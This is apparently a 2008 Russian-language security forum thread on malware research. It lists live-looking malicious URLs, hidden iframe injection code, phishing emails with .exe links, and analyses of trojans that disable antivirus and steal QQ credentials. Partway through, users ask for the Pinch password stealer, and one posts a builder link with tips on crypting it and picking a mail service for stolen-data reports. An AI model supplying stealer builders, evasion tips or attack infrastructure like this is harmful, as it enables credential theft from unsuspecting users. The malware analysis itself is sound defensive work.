В этом топике происходит исследование малвари: вирусни, троянов, как их вычистить и тд.

| Сообщение посчитали полезным:

причем щас на живом нортоне2005 проверил, он из всех этих файлов что скачивает доунлоадер неприбил 5 ( bho, bhos, aadre, 0304, eagle )
обидно однако

началось гдето на этом сайте thetextdesk.com/

www.iframe911.com/buyer/in.cgi через это оно както с сайта на сайт прыгало

mortgages-4-all.com/check/versionl.php
mortgages-4-all.com/check/n14041.htm << похоже на ява скрипт что тут на форуме уже расматривали
abc-powers.com/check/vers195.php какойто лоадер
truemaybe.com/check/n14042.htm << чтото аналогичное
195.93.219.206/sbm/index.php << чтото аналогичное
winhex.org/tds/in.cgi ответил Error: 'can't open redirects.log file'

195.93.219.206/sbm/loader.exe
lskdfjlerjvm.com/arm1/index.php
lskdfjlerjvm.com/arm1/exe.php
195.93.219.206/sbm/exe.php
195.93.219.206/1stat/get_exa.php
195.93.219.206/1stat/get_exb.php
195.93.219.206/1stat/get_exc.php

www.botsys.net/x.html самое веселое название возвращает нмпл с
<iframe src="http://www.iframe911.com/buyer/in.cgi?VSE1" width="0" height="0"></iframe>
<iframe src="http://www.iframe911.com/buyer/in.cgi?1mix1" width="0" height="0"></iframe>
<iframe src="http://www.iframe911.com/buyer/in.cgi?proba" width="0" height="0"></iframe>
<iframe src="http://www.iframe911.com/buyer/in.cgi?baa1" width="0" height="0"></iframe>

| Сообщение посчитали полезным:

fewfwe.com/
fewfwe.com/manda.php
fewfwe.com/exe/jag1.exe

еще из тойже оперы, причем сайт про покупку трафика порадовал

| Сообщение посчитали полезным:

HOMEZ
Многие занимающиеся подобной херней продают и покупаю трафик и сайт ихний находиться на том же серваке где и зоопарк держат. Так как у них выделеный абуза устойчивый сервак в каком нибудь задрищенске или в попеновой ганарее. Так что ничего удивительного.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

Посмотрите кому не лень ( вари под рукой нет ). Пароль virus
Вирь сто %
Dr Web c последними базами не детектит.
Ишел в комплекте с LdPinch
http://slil.ru/25667737 http://slil.ru/25667737

-----
Md5 fcbb6c9c9a5029b24d70f2d67c7cca74

| Сообщение посчитали полезным:

Stack пишет:
Посмотрите кому не лень ( вари под рукой нет ). Пароль virus
Вирь сто %
Dr Web c последними базами не детектит.
Ишел в комплекте с LdPinch
http://slil.ru/25667737 http://slil.ru/25667737
Snatch
add: а я читал один раз его описание где то в интернете, и мне название запомнилось - прямо по Гаю Ричи =)

| Сообщение посчитали полезным:

шит какойто:
0040C200=Dumped_b.0040C200 (ASCII "c:\documents and settings\slava\desktop\buildofclinker\release\snatch.exe")
)
ps: это не снач а какойто BHO-clicker, снач был банкером..

-----
Shalom ebanats!

| Сообщение посчитали полезным:

Hello!
remember me?..
new fotos(archived) you asked
)
hxxp://virtualmix69.com/my_fotos.exe

kiss, Julia D.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

[HEX] пишет:
Hello!
remember me?..
new fotos(archived) you asked
)
hxxp://virtualmix69.com/my_fotos.exe

kiss, Julia D.


сервак не даёт файло!

| Сообщение посчитали полезным:

Наткнулся на флешке на трояна определяеться как Trojan-PSW.Win32.OnlineGames
rapidshare.com/files/107804923/troy.exe.html
PeID определяет как telock но при попытке распаковать untelock099 пишет что упаковано не telock
Хотелось бы узнать куда идут отчеты заранее спасибо.

| Сообщение посчитали полезным:

0x3a
В сеть не видно чтобы ломился.
Но файловые перетрубации автор вируса замутил огого =) нахрена не совсем понятно...
В реестре прописывает себя чтобы стартовал автоматом + при запуске известных ему антивирусов, антитроянов и прочих утилит типа mconfig, regedit и пр.
www.cwsandbox.org/?page=details&id=209854&password=yfzlh

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

[HEX] пишет:
В сеть не видно чтобы ломился.
Недоглядел!
Как мне кажется этот троян от китайских товарищей

Создает свои копии:
C:\WINDOWS\system32\severe.exe
C:\WINDOWS\system32\.exe
C:\WINDOWS\system32\drivers\.exe
C:\WINDOWS\system32\drivers\conime.exe
C:\WINDOWS\system32\verclsid.dat

Записывается в Автозагрузку:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell "C:\WINDOWS\system32\drivers\conime.exe"
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "C:\WINDOWS\system32\severe.exe"

Также в реестре записывает множество ключей, которые должны блокировать доступ к другим программам
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
360Safe.exe File not found: C:\WINDOWS\system32\drivers\.exe
adam.exe File not found: C:\WINDOWS\system32\drivers\.exe
avp.com File not found: C:\WINDOWS\system32\drivers\.exe
avp.exe File not found: C:\WINDOWS\system32\drivers\.exe
EGHOST.exe File not found: C:\WINDOWS\system32\drivers\.exe
IceSword.exe File not found: C:\WINDOWS\system32\drivers\.exe
iparmo.exe File not found: C:\WINDOWS\system32\drivers\.exe
kabaload.exe File not found: C:\WINDOWS\system32\drivers\.exe
KRegEx.exe File not found: C:\WINDOWS\system32\drivers\.exe
KvDetect.exe File not found: C:\WINDOWS\system32\drivers\.exe
KVMonXP.kxp File not found: C:\WINDOWS\system32\drivers\.exe
KvXP.kxp File not found: C:\WINDOWS\system32\drivers\.exe
MagicSet.exe File not found: C:\WINDOWS\system32\drivers\.exe
mmsk.exe File not found: C:\WINDOWS\system32\drivers\.exe
msconfig.com File not found: C:\WINDOWS\system32\drivers\.exe
msconfig.exe File not found: C:\WINDOWS\system32\drivers\.exe
NOD32.exe File not found: C:\WINDOWS\system32\drivers\.exe
PFW.exe File not found: C:\WINDOWS\system32\drivers\.exe
PFWLiveUpdate.exe File not found: C:\WINDOWS\system32\drivers\.exe
QQDoctor.exe File not found: C:\WINDOWS\system32\drivers\.exe
Ras.exe File not found: C:\WINDOWS\system32\drivers\.exe
Rav.exe File not found: C:\WINDOWS\system32\drivers\.exe
RavMon.exe File not found: C:\WINDOWS\system32\drivers\.exe
regedit.com File not found: C:\WINDOWS\system32\drivers\.exe
regedit.exe File not found: C:\WINDOWS\system32\drivers\.exe
runiep.exe File not found: C:\WINDOWS\system32\drivers\.exe
SREng.EXE File not found: C:\WINDOWS\system32\drivers\.exe
TrojDie.kxp File not found: C:\WINDOWS\system32\drivers\.exe
WoptiClean.exe File not found: C:\WINDOWS\system32\drivers\.exe

Запускает:
C:\WINDOWS\system32\.exe
C:\WINDOWS\system32\severe.exe
C:\WINDOWS\system32\drivers\conime.exe

Создает и запускает батник: C:\WINDOWS\system32\hx1.bat
@echo off
set date=2004-1-22
ping ** localhost > nul
date %date%
del %0


1. Скачивает www.cd321.net/30w.txt в C:\WINDOWS\system32\dqhx1.txt
Запускает Explorer.exe с параметрами записанными в dqhx1.txt =http://www.dvdforone.com/chcou.htm

2. Скачивает www.ctv163.com/admin/down.txt в C:\WINDOWS\system32\dqhx3.txt
Скачивает в C:\WINDOWS\system32 тот файл, который был записан в dqhx3.txt = www.is123.cn/admin/qqniubi.exe
Копирует этот файл в C:\WINDOWS\system32\qqniubi.exe, к имени файла добавляется "new", после чего запускается newqqniubi.exe

Создает C:\WINDOWS\system32\.dll
.dll ищет процесс с именем QQ.exe, далее удаляет какие-то файлы относящиеся к QQ.exe, после чего отправлятся данные о QQ.exe типа логина и пасса, куда х.з так и не понял
дальше его исследовать надоело

P.S QQ - популярный в Китае клиент мгновенного обмена сообщениями

-----
Nulla aetas ad discendum sera

| Сообщение посчитали полезным:

Flint
Хмм... прикольно.
Интересно каким чудом он не спалился на www.cwsandbox.org работая с сетью.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

Flint, [HEX] пасиб большое

| Сообщение посчитали полезным:

А свеженького пинча, чтобы мыло сменить можно было, кто подбросит? Или чтоб в файл сохранял пассенги, что еще лучше. Или мож кто скомпилит

| Сообщение посчитали полезным:

Ara пишет:
А свеженького пинча
а нету свеженьких, все старого криптуют и все!
Держи билдер dump.ru/files/p/p781248171/ настроишь, покриптуешь.
на маил.ру отчеты не приходят, лучше юзай tut.by

-----
Nulla aetas ad discendum sera

| Сообщение посчитали полезным:

спс.
ЗЫ: а каким парсером глядеть отчеты? Parser.2.3.1.7 не хотит показывать ничего.

| Сообщение посчитали полезным:

у меня Parser 2.3.1.8 есть, если что... но не думаю, что 1.7 не показывает

-----
z+Dw7uLu5+jqLCDq7vLu8PvpIPHs7uMh

| Сообщение посчитали полезным:

Я в свое время тож искал. Для мыльных пинчей нашел Parser 2.3.1.6 dump.ru/files/p/p025098545/ , он бажный, но самое главное чтоб отчет переварил, а потом юзаю другой - Parser 2.3.1.7

-----
Nulla aetas ad discendum sera

| Сообщение посчитали полезным:

Flint, спс, ...1.6 кажет всё. У мну с компа ничего выудить не удалось пинчу, это радует

| Сообщение посчитали полезным:

Кто-нить может поломать гейты?

www.surok.tu1.ru/gate/gate.php
www.scorpinch.110mb.com/gate/gate.php
uins-shop.1gb.in/gate/gate.php
x-file.890m.com/gate/gate.php
www.vano43.1gb.in/beerka/gate.php
lolko23.110mb.com/gate/gate.php

или админку ботнета
candy-country.com/botcool/auth.php

-----
Nulla aetas ad discendum sera

| Сообщение посчитали полезным:

Ara пишет:
спс.
ЗЫ: а каким парсером глядеть отчеты?

этим: Download-Link #1: rapidshare.com/files/111265193/Parser3.rar.html

-----
-=истина где-то рядом=-

| Сообщение посчитали полезным:

До чего наглыми стали трояно/вирусо рассылатели, вот что приходит мне на мыло :

Тема: Привет.... Оцени мои новые фотки ;))
От: Lenochka <skeetz@8thdeadlysim.com>
Дата: 29 апреля 2008 17:00:00

Привет , Помнишь меня? ;))
В архиве мои новые фотки как ты просил...
scavolinibari.it/My_foto.exe
Целую,
Твоя Леночка

и такое же письмецо но уже с другого ящика:

Тема: Привет.... Оцени мои новые фотки ;))
От: Lenochka <billing@aloha-cafe.net>

Дата: 29 апреля 2008 17:01:00

Привет , Помнишь меня? ;))
В архиве мои новые фотки как ты просил...
fnsa.com.ar/My_foto.exe
Целую,
Твоя Леночка

Ясен красен что там не фотки а зверек сидит.

-----
Don_t hate the cracker - hate the code.

| Сообщение посчитали полезным:

Гы, фотка там действительно есть (в ресурсах) + вирь

Но какой идеот откроет My_foto.exe? Гы.

-----
-=истина где-то рядом=-

| Сообщение посчитали полезным:

mysterio пишет:
Ясен красен что там не фотки а зверек сидит.

Есть и симпатишная!

Анпакнул я этот файлег, устанавливает через сервисы драйвер grande48.sys в C:\WINDOWS\system32\drivers, также в Temp создает батник "_it.bat" примерно такого содержания:
:abc
del "C:\Documents and Settings\Андрей\Рабочий стол\Dumped_.exe"
if exist "C:\Documents and Settings\Андрей\Рабочий стол\Dumped_.exe" goto abc
rmdir "C:\Documents and Settings\Андрей\Рабочий стол"
del "C:\DOCUME~1\86A9~1\LOCALS~1\Temp\_it.bat"

Чем занимается драйвер, х.з помоему он пошифрован, мож кто копнет дальше?
На вирустотале большинство аверов сказали что это Srizbi
Более подробное описание [url=http://safe.cnews.ru/bugtrack/entry/index.shtml?malicious/2007/06 /20/101142 ]--> тут <--[/url]

a055_30.04.2008_CRACKLAB.rU.tgz - grande48.rar

-----
Nulla aetas ad discendum sera

| Сообщение посчитали полезным:

С начала думал в хумор засунуть, но с другой строны грустно ведь (:
www.anti-malware.ru/forum/showtopic=4564&st=0

-----
Crack your mind, save the planet

| Сообщение посчитали полезным:

Styx
Ага ещеб кто исходником рустока поделился бы

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

зацените файлег. подозрение на пенча, но сумневаюсь.
если пенч то скажите кейлоги вёл или нет, ибо я его запустил.
пасс: 1

d9d2_13.05.2008_CRACKLAB.rU.tgz - svchоst.rar

-----
AutoIt

| Сообщение посчитали полезным:

ищет на рабочем столе, в программах, потом на всех хардах ASCII "L2.EXE"
суда стучит _ttp://real-adena.ru/new/fgdhhj.php?login=
если ничего не найдено, то удаляется батником.
запакованно по-моему от глоффа криптором

з.ы. а если найдено, я не посмотрел, толи пассы тянет, толи ещё что))

-----
[nice coder and reverser]

| Сообщение посчитали полезным:

а если найдено каково поведение?
ибо у меня таковой файл имеется))

-----
AutoIt

| Сообщение посчитали полезным:

OLEGator пишет:
зацените файлег. подозрение на пенча, но сумневаюсь.
если пенч то скажите кейлоги вёл или нет, ибо я его запустил.
Это не пинч. В нэт не лезет.
Может мне и показалось, но кажется он удалет LineAge2 с компа(exe и updates)
создаёт батник, пишетя в реестр, копирается в папку с виндой

оеп: 405E60

зы. судя по сообщению Hellspawn, там ещё что-то покриптованно

| Сообщение посчитали полезным: